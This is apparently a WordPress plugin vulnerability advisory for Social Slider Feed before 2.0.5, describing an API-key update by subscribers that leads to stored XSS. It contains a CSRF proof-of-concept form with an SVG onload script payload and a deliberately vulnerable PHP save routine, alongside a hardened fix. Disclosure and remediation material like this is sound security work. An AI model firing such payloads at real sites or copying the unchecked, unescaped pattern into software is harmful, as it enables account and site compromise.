WordPress Plugin Vulnerabilities

Social Slider Feed < 2.0.5 - Subscriber+ Arbitrary API Key Update to Stored XSS

Description

The plugin has no authorisation or CSRF checks in place when saving the YouTube API Key, and neither sanitises the value on input nor escapes it on output. As a result, users with a role as low as Subscriber can change the key, including setting it to a Stored Cross-Site Scripting payload.

Proof of Concept

As any authenticated user, such as a Subscriber, or via CSRF against such a user:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=settings-wisw" method="POST">
      <input type="hidden" name="wyt_api_key" value='a"><svg/onload=alert(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Despite the "Sorry, you are not allowed to access this page." error returned to the low-privileged user, the API Key is still updated.

The XSS is triggered when an administrator views the plugin's Profile Dashboard (wp-admin/admin.php?page=settings-wisw), where the stored key is rendered without escaping.
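The advisory names three missing controls (authorisation, CSRF protection, sanitisation/escaping). The following is an added illustration, not the plugin's actual code: a settings-save pattern that reproduces the described behaviour, placed beside a hardened version using the standard WordPress primitives. The option name `wyt_api_key`, the nonce action `wisw_save_settings`, the `admin_init` hook and the `manage_options` capability are assumptions; the field name `wyt_api_key` and the page slug `settings-wisw` come from the advisory.

```php
<?php
// Added example (not the plugin's code). Assumed names: option 'wyt_api_key',
// nonce action 'wisw_save_settings', hook 'admin_init', capability 'manage_options'.

/* ---------- Vulnerable pattern (for contrast; do not register) ---------- */

// A save routine hooked on admin_init runs on every admin request for every
// logged-in user, before the menu page's own capability check. That is one way
// the key can be written even though the page answers "Sorry, you are not
// allowed to access this page." (the advisory does not state the plugin's hook).
function wisw_save_api_key_vulnerable() {
    if ( isset( $_POST['wyt_api_key'] ) ) {
        // No capability check, no nonce check, no sanitisation.
        update_option( 'wyt_api_key', $_POST['wyt_api_key'] );
    }
}
// add_action( 'admin_init', 'wisw_save_api_key_vulnerable' );

// Unescaped output: a stored value containing markup becomes Stored XSS
// for whoever views the settings page.
function wisw_render_api_key_field_vulnerable() {
    echo '<input type="text" name="wyt_api_key" value="' . get_option( 'wyt_api_key' ) . '">';
}

/* ---------- Hardened pattern ---------- */

function wisw_save_api_key_secure() {
    if ( ! isset( $_POST['wyt_api_key'] ) ) {
        return;
    }
    // 1. Authorisation: only users who may manage options can change the key.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Sorry, you are not allowed to do that.', 403 );
    }
    // 2. CSRF: require a valid nonce bound to this specific action
    //    (check_admin_referer() dies with a 403 on a missing or bad nonce).
    check_admin_referer( 'wisw_save_settings', 'wisw_nonce' );
    // 3. Sanitise on input: unslash, then strip tags and control characters.
    $key = sanitize_text_field( wp_unslash( $_POST['wyt_api_key'] ) );
    // Assumed allow-list: an API key is an opaque token, so reject anything
    // outside a conservative character set before it is stored.
    if ( '' !== $key && ! preg_match( '/^[A-Za-z0-9_-]+$/', $key ) ) {
        wp_die( 'Invalid API key format.', 400 );
    }
    update_option( 'wyt_api_key', $key );
}
add_action( 'admin_init', 'wisw_save_api_key_secure' );

// 4. Escape on output, and emit the nonce field alongside the input so the
//    legitimate settings form carries the token the save handler requires.
function wisw_render_api_key_field_secure() {
    wp_nonce_field( 'wisw_save_settings', 'wisw_nonce' );
    echo '<input type="text" name="wyt_api_key" value="'
        . esc_attr( get_option( 'wyt_api_key', '' ) ) . '">';
}
```

Each of the four controls closes a different part of the described issue: the capability check stops Subscribers, the nonce stops cross-site requests even from an administrator's browser, input sanitisation plus the allow-list keeps markup out of the database, and `esc_attr()` on output means a value that somehow does reach the option cannot break out of the attribute. Applying only the escaping would hide the XSS while leaving the unauthorised key change in place.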

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
WPScan
Verified
Yes

Timeline

Publicly Published
2022-08-01
Added
2022-08-01
Last Updated
2022-08-01
